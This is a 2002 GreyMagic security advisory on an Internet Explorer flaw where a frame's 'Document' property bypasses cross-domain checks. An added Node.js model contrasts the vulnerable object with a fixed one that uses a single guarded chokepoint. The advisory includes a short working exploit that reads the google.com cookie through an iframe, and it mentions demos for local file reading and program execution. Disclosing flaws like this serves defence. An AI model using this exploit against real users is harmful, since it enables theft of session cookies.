- GreyMagic Security Advisory GM#011-IE
- =====================================
-
- By GreyMagic Software, Israel.
- 15 Oct 2002.
-
- Available in HTML format at http://security.greymagic.com/adv/gm011-ie/.
-
- Topic: Internet Explorer : The D-Day.
-
- Discovery date: 26 Sep 2002.
-
- Affected applications:
- ======================
-
- Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not
- vulnerable.
-
- Note that any other application that uses Internet Explorer's engine
- (WebBrowser control) is affected as well (Outlook under the Internet zone,
- MSN Explorer, etc.).
-
-
- Introduction:
- =============
-
- The <frame> and <iframe> elements may contain URLs in other domains or
- protocols, and are therefore subject to strict security rules that prevent
- script in one domain from accessing content and information in another.
- Microsoft explains the issue in its Cross-Frame Scripting article -
- http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp.
-
- There are several ways to refer to an <iframe>'s (or <frame>) document in
- Internet Explorer (assuming <iframe id="oFrameId">):
-
- * oFrameId.document
- * document.all.oFrameId.contentWindow.document
- * frames.oFrameId.document
- * And others..
-
- All these methods are handled correctly by Internet Explorer and prevent any
- attempt to access a document that originates from a foreign domain.
-
-
- Discussion:
- ===========
-
- The <iframe> and <frame> elements are really instances of the WebBrowser
- control supplied by Microsoft. The WebBrowser control exposes several
- potentially dangerous properties by default, which Microsoft overrides in
- Internet Explorer.
-
- However, Microsoft missed out on one important property -- "Document", with
- a capital "D".
-
- Normally, "oElement.document" returns a reference to the document that owns
- the element, and this holds for <frame> and <iframe> elements as well.
- However, we discovered that "oIFrameElement.Document" (capital "D") instead
- returns the document contained inside the frame, and no security check is
- performed to determine whether that document belongs to a different domain.
-
- This provides free and full access to the frame's Document Object Model,
- which allows an attacker to steal cookies from any site, read and forge
- content in other sites, read local files and execute arbitrary programs on
- the client's machine (script running in the "My Computer" zone).
-
- Both Internet Explorer 5.5 SP2 and Internet Explorer 6 are vulnerable, but
- surprisingly the vulnerability is absent from IE6 SP1. It is hard to believe
- that Microsoft deliberately plugged it, since IE5.5 remains vulnerable, yet
- somehow this stray property is protected in IE6 SP1.
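To make the mechanism in the Introduction and Discussion concrete, here is an added model in JavaScript (Node.js). It is written for this page; it is not GreyMagic's code and not Internet Explorer's source. It models a frame element whose scripting-visible path to the framed document (contentWindow.document) carries the cross-frame check while a second spelling of the same property ("Document") does not, and then shows the hardened form, where every path goes through one chokepoint. The origins, cookie values and function names are constructed for illustration; only the "document"/"Document" property names come from the advisory.

```javascript
// Added example (not GreyMagic's code): a Node.js model of the bug described
// above. A frame object exposes the framed document through two properties:
// "contentWindow.document" (guarded by a cross-frame check) and "Document"
// (the raw WebBrowser-control property, unguarded). Routing every spelling
// through one guarded chokepoint removes the bypass.
// Origins, cookies and helper names below are constructed for illustration.

"use strict";

// Origin = scheme + host + port, the tuple cross-frame scripting compares.
// The WHATWG URL parser drops a default port, so ":80" on http compares equal.
function parseOrigin(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.hostname}${u.port ? ":" + u.port : ""}`;
}

function sameOrigin(urlA, urlB) {
  return parseOrigin(urlA) === parseOrigin(urlB);
}

// A minimal "document" carrying the fields an attacker would want.
function makeDocument(url, cookie) {
  return { URL: url, cookie: cookie, body: { innerHTML: "<p>secret page</p>" } };
}

// Vulnerable model: the check is bolted onto the scripting-visible accessor
// only. The second, unmapped spelling hands out the framed document directly.
function makeFrameElementVulnerable(ownerDoc, framedDoc) {
  return {
    // "document" on an element is its owner document (the page holding the frame)
    get document() { return ownerDoc; },
    // contentWindow.document is where the cross-frame rule is applied
    get contentWindow() {
      return {
        get document() {
          if (!sameOrigin(ownerDoc.URL, framedDoc.URL)) {
            throw new Error("Permission denied: cross-frame access");
          }
          return framedDoc;
        },
      };
    },
    // The stray property: no check at all (the advisory's "Document")
    get Document() { return framedDoc; },
  };
}

// Hardened model: a single chokepoint. Every path that can reach the framed
// document calls it, so an alias cannot bypass the rule.
function makeFrameElementFixed(ownerDoc, framedDoc) {
  function guardedFramedDoc() {
    if (!sameOrigin(ownerDoc.URL, framedDoc.URL)) {
      throw new Error("Permission denied: cross-frame access");
    }
    return framedDoc;
  }
  return {
    get document() { return ownerDoc; },
    get contentWindow() { return { get document() { return guardedFramedDoc(); } }; },
    get Document() { return guardedFramedDoc(); },
  };
}

// Try to read the framed document's cookie via the given property path.
// Returns the cookie string on success, or null if access was denied.
function readFramedCookie(frameEl, via) {
  try {
    const doc = via === "Document" ? frameEl.Document : frameEl.contentWindow.document;
    return doc.cookie;
  } catch (e) {
    return null;
  }
}

// Constructed scenario: a page at http://attacker.example frames a page at
// http://victim.example that holds a session cookie.
const attackerDoc = makeDocument("http://attacker.example/evil.html", "");
const victimDoc = makeDocument("http://victim.example/", "SID=constructed-session-id");

const vulnerable = makeFrameElementVulnerable(attackerDoc, victimDoc);
const fixed = makeFrameElementFixed(attackerDoc, victimDoc);

// Same-origin framing must still work through the guarded path.
const sameSite = makeFrameElementFixed(victimDoc, makeDocument("http://victim.example/page2", "SID=same"));

console.log("vulnerable, contentWindow.document:", readFramedCookie(vulnerable, "contentWindow"));
console.log("vulnerable, Document:", readFramedCookie(vulnerable, "Document"));
console.log("fixed, Document:", readFramedCookie(fixed, "Document"));
console.log("fixed, same origin:", readFramedCookie(sameSite, "Document"));
```

Run it with `node` to see the cross-origin read succeed only through the unguarded "Document" path of the vulnerable model and be denied on both paths of the fixed one. The design point is the one the advisory makes by accident: a check enforced at one accessor protects nothing if the underlying object is reachable by another name.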
-
-
- Exploit:
- ========
-
- This exploit demonstrates how an attacker may choose to read the client's
- "google.com" cookie.
-
- <script language="jscript">
- onload=function () {
-   // Timer necessary to prevent weird behavior in some conditions
-   setTimeout(
-     function () {
-       // "document" (lower case) would return this page's own document;
-       // "Document" (capital D) returns the framed google.com document
-       // with no cross-domain check.
-       alert(document.getElementById("oVictim").Document.cookie);
-     },
-     100
-   );
- }
- </script>
- <iframe src="http://google.com" id="oVictim"></iframe>
-
-
- Solution:
- =========
-
- Until a patch becomes available either disable Active Scripting or upgrade
- to IE6 SP1.
-
-
- Tested on:
- ==========
-
- IE5.5 Win98.
- IE5.5 NT4.
- IE6 Win98.
- IE6 Win2000.
- IE6 WinXP.
-
-
- Demonstration:
- ==============
-
- We put together four proof-of-concept demonstrations:
-
- * Simple: Reads the client's "google.com" cookie.
- * D-Day Console: Automatically load and execute commands on any site.
- * D-Day Reading: Read local files by accessing a res:// URL.
- * D-Day Execution: Execute arbitrary programs by accessing a res:// URL.
-
- They can all be found at http://security.greymagic.com/adv/gm011-ie/.
-
-
- Feedback:
- =========
-
- Please mail any questions or comments to security@greymagic.com.
-
- - Copyright © 2002 GreyMagic Software.
-
-
-